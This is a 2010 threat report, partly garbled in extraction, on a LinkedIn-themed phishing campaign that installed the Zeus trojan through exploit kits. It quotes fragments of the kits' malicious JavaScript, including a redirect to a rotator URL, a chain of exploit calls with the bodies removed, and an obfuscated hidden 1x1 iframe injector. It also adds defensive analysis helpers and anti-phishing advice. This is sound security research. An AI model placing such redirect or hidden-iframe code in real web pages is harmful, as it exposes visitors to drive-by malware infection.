daedalusfocus-linkedin-prf5 (1)

Upload: robi-sen

Post on 09-Apr-2018


  • 8/7/2019 DaedalusFOCUS-LINKEDIN-prf5 (1) 1/7

    ISSUE DATE: 22 OCTOBER 2010

    LARGE-SCALE MALICIOUS LINKEDIN PHISHING CAMPAIGN


    Copyright and Disclaimer

    This report is Entity X, 2010. Where it has not been possible to locate the original copyright owner of photographs and other non-Entity X content we tender our apologies to any owner whose rights may have been unwittingly infringed. The links to external websites included in this report are for ease of reference only and Entity X takes no responsibility for the content presented.

    THE DAEDALUS REPORT SERIES

    The Entity X Daedalus series of reports informs clients of emerging trends and developments in the areas of cyber threats, net-centric security and electronic attack, authored by respected experts on the subject. The main monthly Daedalus Report provides comprehensive analysis of notable emerging issues; Daedalus Focus reports are issued as developments occur, providing technical detail and code samples when appropriate; Daedalus Special reports are issued to certain government clients only, highlighting sensitive matters relating to exploitation opportunities. All Daedalus subscribers are invited to request subjects to be covered in our Focus and Special reports, and provide feedback on any of our products.

    Contributors

    Robi Sen, Analysis Director, Entity X

    ABOUT ENTITY X

    but now it affects every aspect of our lives, our work and our government.

    and net-centric warfare. We're a team of highly experienced IT professionals

    we seek to develop in our clients a greater and deeper understanding of the range of disparate yet rapidly evolving threats that governments, businesses and individuals face. Entity X Inc produces the Daedalus report series to inform and brief our clients and we also provide consultancy and training in this specialized


    Report Overview

    A malicious phishing campaign themed on the LinkedIn networking website has been underway since the last week of September and through early October. The campaign shows a higher than usual degree of sophistication on the part of the phishers: although the phishing emails all use well-crafted LinkedIn-style templates intended to trick the user into following a link to a website that will attempt to exploit their browser to install a Zeus trojan, the actual exploits are being auto-generated by crimeware tools. Furthermore, the phishers have changed the crimeware tools they use multiple times, perhaps in an attempt to keep building momentum for their campaign. This could be a trend in phishing and malware attacks where malicious hackers and criminal networks use crimeware to accelerate and keep changing their campaigns in order to reduce the ability of email providers, ISPs, and similar to counter them.

    SUMMARY

    Large-scale and changing LinkedIn-themed phishing attack underway from late September into October

    Attack tactic involves changing the means used to exploit targets

    Phishing campaign developers making large-scale use of various crimeware tools to attempt to install Zeus trojans

    Attack demonstrates a more sophisticated, persistent, and adaptable phishing campaign than usual, perhaps because of use of crimeware tools that enable rapid setup and development of malware attacks

    LinkedIn-Themed Phishing Email

    Recently a more sophisticated than usual phishing campaign has been targeting users of the professional social networking site LinkedIn. Although the threat from the campaign is not particularly high it shows an increasing sophistication in phishing tactics, an increase in the use of crimeware [1] tools, and an increase in the targeting of social networks. An example of one of the phishing emails can be seen in Fig. 1 as it appeared in Google's Gmail. One of

    people have been tricked into believing this is a genuine LinkedIn email.

    [1] By crimeware toolkits we mean software specially written for criminals that makes the generation of viruses, trojans, malware-infected websites, spam/phishing campaigns, and even command and control of botnets simple GUI-based operations.


    Fig. 1: A LinkedIn phishing email as it appeared in Gmail

    Analysis

    Clicking on the "Visit your InBox now" link takes the user to a website (see Code Listing 1 below) which first redirects the user to a second website that attempts to exploit their machine via JavaScript created by the SEO Sploitkit.

        // Java available: tag the redirect with 2
        if (navigator.javaEnabled())
        {
            var metka = 2;
        }
        location.href = ("http://someaddress.info/asdfasgs/rotator.php?unique=" + metka + "");
        // navigator.taintEnabled() is spelled via string concatenation to dodge simple
        // signature matching; it returns false in current browsers, so this branch runs
        if (!frames.navigator["taintE" + "nabled"]())
        {
            var metka = 1;
        }
        location.href = ("http://someaddres.info/asdfasgs/rotator.php?unique=" + metka + "");

    Code Listing 1: Simple JavaScript that redirects the user, depending on whether it can perform a data tainting attack

    if none of them works the user is simply redirected to Google. The JavaScript is actually

    Windows Help and Support, and Adobe's Acrobat Reader via a PDF. For an example see Code Listing 2 and Code Listing 3 below.

    http://www.ipolicynetworks.com/technology/files/Seo_Analysis.html

        // exploit function bodies are elided in the report; each returns whether it fired
        function PDF()
        { .. }
        function arbt()
        { .. }
        function JAVABOF()
        { .. }
        function MkM720Jny()
        { .. }
        function JAVASGB()
        { .. }
        function JAVASMB()
        { .. }
        if (PDF() || arbt() || MkM720Jny() || JAVASMB() || JAVASGB() || JAVABOF() )
        {
        }
        // after 7 s, plus a further 1 s, bounce the user to Google whatever the outcome
        setTimeout(function ()
        {
            REDIRECT()
        }
        , 7000);
        function redir()
        {
            window.location = "http://google.com";
        }
        function REDIRECT()
        {
            setTimeout("redir()", 1000);
        }

    Code Listing 2: SEO Sploitkit-generated JavaScript that calls six different functions each of which tries to install the Zeus trojan

        // fragment: the enclosing function header is not reproduced in the report
        Xbwd72ue1rb = 25-(12*2);   // evaluates to 1: a 1x1 pixel element
        var Jztblyv7l = document.createElement("div");
        Jztblyv7l.id = "Gtjpqcdqt9jlbp";
        document.body.appendChild(Jztblyv7l);
        Yej6pkmusdgjp = Xbwd72ue1rb;
        // the regex strips the junk characters, leaving the tag name "iframe"
        Qb0inb27krky = document.createElement(("i)@f&!r())a !#&m)&e@))").replace(/$|#|&|\ |\(|\)|@|\!/ig, ""));
        Qb0inb27krky.src = Rioso4oplcgzzhd8;
        Qb0inb27krky.height = Xbwd72ue1rb;
        Qb0inb27krky.width = Xbwd72ue1rb;
        document.getElementById("Gtjpqcdqt9jlbp").appendChild(Qb0inb27krky);
        return 0;
        }

    Code Listing 3:
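    To see what Listing 3 actually builds without running it, the following added analysis helper (not code from the report or from the exploit kit) replays the string-stripping regex on the obfuscated literal and evaluates the size arithmetic. The sample script it inspects is constructed to mirror Listing 3; the variable names are taken from it.

```javascript
// Constructed sample modelled on Code Listing 3; not a live capture.
const SAMPLE = String.raw`
Xbwd72ue1rb = 25-(12*2);
var Jztblyv7l = document.createElement("div");
Qb0inb27krky = document.createElement(("i)@f&!r())a !#&m)&e@))").replace(/$|#|&|\ |\(|\)|@|\!/ig, ""));
Qb0inb27krky.height = Xbwd72ue1rb;
Qb0inb27krky.width = Xbwd72ue1rb;
`;

// Resolve "name = a-(b*c);" constant assignments to plain numbers.
function resolveConstants(src) {
  const consts = {};
  const re = /(\w+)\s*=\s*(\d+)\s*-\s*\((\d+)\s*\*\s*(\d+)\)\s*;/g;
  let m;
  while ((m = re.exec(src)) !== null) {
    consts[m[1]] = Number(m[2]) - Number(m[3]) * Number(m[4]);
  }
  return consts;
}

// Replay the script's own strip-regex on its obfuscated literal with RegExp,
// not eval, so only the string operation is reproduced.
function resolveTagNames(src) {
  const tags = [];
  const re = /createElement\(\("([^"]*)"\)\.replace\(\/(.*?)\/([a-z]*),\s*""\)\)/g;
  let m;
  while ((m = re.exec(src)) !== null) {
    tags.push(m[1].replace(new RegExp(m[2], m[3]), ""));
  }
  return tags;
}

// Pair the created tags with their sizes: an iframe of 2px or less is the
// classic hidden exploit-kit loader, which is what Listing 3 builds.
function analyse(src) {
  const consts = resolveConstants(src);
  const tags = resolveTagNames(src);
  const sizes = [];
  const re = /\.(?:height|width)\s*=\s*(\w+)\s*;/g;
  let m;
  while ((m = re.exec(src)) !== null) {
    sizes.push(m[1] in consts ? consts[m[1]] : Number(m[1]));
  }
  const tiny = sizes.length > 0 && sizes.every((s) => s <= 2);
  return { tags, sizes, hiddenIframe: tags.includes("iframe") && tiny };
}
```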


    If any of these exploits work then the user's computer will be infected with the Zeus trojan.

    a period of a few days, appeared to change the crimeware kit they used two times. The

    Phoenix toolkit. Then within a number of days the perpetrator started another mass-emailing using the Crimepack toolkit, each time using slightly different exploits but in general always to push trojans that would turn an exploited user's computer into a zombie for a botnet like Zeus. This is important in that it shows how crimeware allows even technically unsophisticated criminal groups to rapidly change their attack campaigns.

    Fortunately most of the major anti-virus and malware companies keep up with crimeware

    However, many users do not keep their anti-virus programs up to date and are therefore putting themselves at risk from such phishing attacks. Furthermore, it also seems that variants of this same phishing campaign targeted Apple OSX users, infecting them with the Zeus trojan. This is interesting in that while OSX has been attacked and has numerous viruses, Apple operating systems have largely been ignored by phishing attacks using malware to infect user systems, suggesting that malware campaigns will increasingly attack Apple products.

    Avoiding Phishing Campaigns

    1 Authenticate senders

    2 Look for obvious signs of phishing

    3 Do not click on links

    4 Be careful when opening attachments, regardless of sender

    applications up to date

    Phishing attacks depend on the fact that most computer users practise poor internet hygiene, are not aware of threats, and are too busy or distracted to pay attention to the content of their emails. Almost all but the most sophisticated of phishing attacks can be avoided by following some very simple steps:

    1 Authenticating senders: Always turn on view email headers in your email program.

    Gmail, offer an equivalent.

    2 Look for obvious signs of phishing: Look for bogus email addresses, link addresses that do not match the sender, poorly spelled or grammatically incorrect content, or simply out-of-context requests. For an example see Fig. 2.

    3 Do not click on links: For example, in the case of this LinkedIn campaign, instead of clicking on "Visit your InBox now" users would be protected by going directly to the LinkedIn website and checking their messages from there.

    http://mipistus.blogspot.com/2009/09/phoenix-exploits-kit-otra-alternativa.html#googtrans%28es%7Cen%29

    http://www.offensivecomputing.net/?q=node/1572

    http://mail.google.com/support/bin/answer.py?hl=en&answer=180707

    4 Be careful when opening attachments, regardless of sender: Unless you are

    authenticity of their email.

    up to date:

    but most malware threats take advantage of security holes in browsers, applications,

    users not keeping their systems up to date.
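    The checks in steps 1 to 3 can be automated. The following is an added example, not from the report, that parses a raw message and reports sender-domain and link-target mismatches; the message is constructed to resemble the lure, and its addresses and URLs are placeholders rather than indicators from the campaign.

```javascript
// Constructed sample resembling the LinkedIn lure; addresses and URLs are placeholders.
const SAMPLE_MAIL = [
  "From: LinkedIn <messages-noreply@linkedin.com>",
  "Return-Path: <bounce@mailer-placeholder.example>",
  "",
  '<a href="http://someaddress.info/asdfasgs/">Visit your InBox now</a>',
  '<a href="http://www.linkedin.com/help">Help</a>',
].join("\r\n");

function parseHeaders(raw) {
  const headers = {};
  for (const line of raw.split("\r\n\r\n")[0].split("\r\n")) {
    const i = line.indexOf(":");
    if (i > 0) headers[line.slice(0, i).toLowerCase()] = line.slice(i + 1).trim();
  }
  return headers;
}

// Domain of the address in a From/Return-Path style field, ignoring the display name.
function domainOfAddress(field) {
  const m = /([^<>\s]+)@([^<>\s]+)>?\s*$/.exec(field || "");
  return m ? m[2].toLowerCase() : null;
}

function domainOfUrl(url) {
  const m = /^https?:\/\/([^/:?#]+)/i.exec(url);
  return m ? m[1].toLowerCase() : null;
}

// Step 1: the visible From domain should match the envelope sender.
// Steps 2-3: every link's real target should sit under the sender's domain.
function phishingIndicators(raw) {
  const h = parseHeaders(raw);
  const fromDomain = domainOfAddress(h.from);
  const pathDomain = domainOfAddress(h["return-path"]);
  const findings = [];
  if (fromDomain && pathDomain && fromDomain !== pathDomain)
    findings.push(`sender mismatch: From ${fromDomain}, Return-Path ${pathDomain}`);
  const body = raw.split("\r\n\r\n").slice(1).join("\r\n\r\n");
  const re = /<a\s+[^>]*href="([^"]+)"[^>]*>([^<]*)<\/a>/gi;
  for (const m of body.matchAll(re)) {
    const target = domainOfUrl(m[1]);
    const trusted = target === fromDomain || (target && target.endsWith("." + fromDomain));
    if (fromDomain && target && !trusted)
      findings.push(`link "${m[2]}" points to ${target}, not ${fromDomain}`);
  }
  return findings;
}
```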

    Fig. 2: LinkedIn phishing email from 1 October 2010. When viewed in Microsoft Outlook with view headers turned on the email address can be immediately

    while mousing over a link shows it pointing to a suspect URL

    Fake address

    Phishing link

    IMPLICATIONS

    Security professionals: Spam and phishing will continue to be major issues, with training users on how to protect themselves from this threat being the major means to stop it.

    Intelligence professionals: Intelligence professionals should note that it would be a short step from theming LinkedIn phishing emails to actually setting up a campaign that targets intelligence professionals who use LinkedIn themselves. There is a surprisingly high number of law enforcement, defence, security, and intelligence employees who use LinkedIn who could be susceptible to targeted phishing attacks.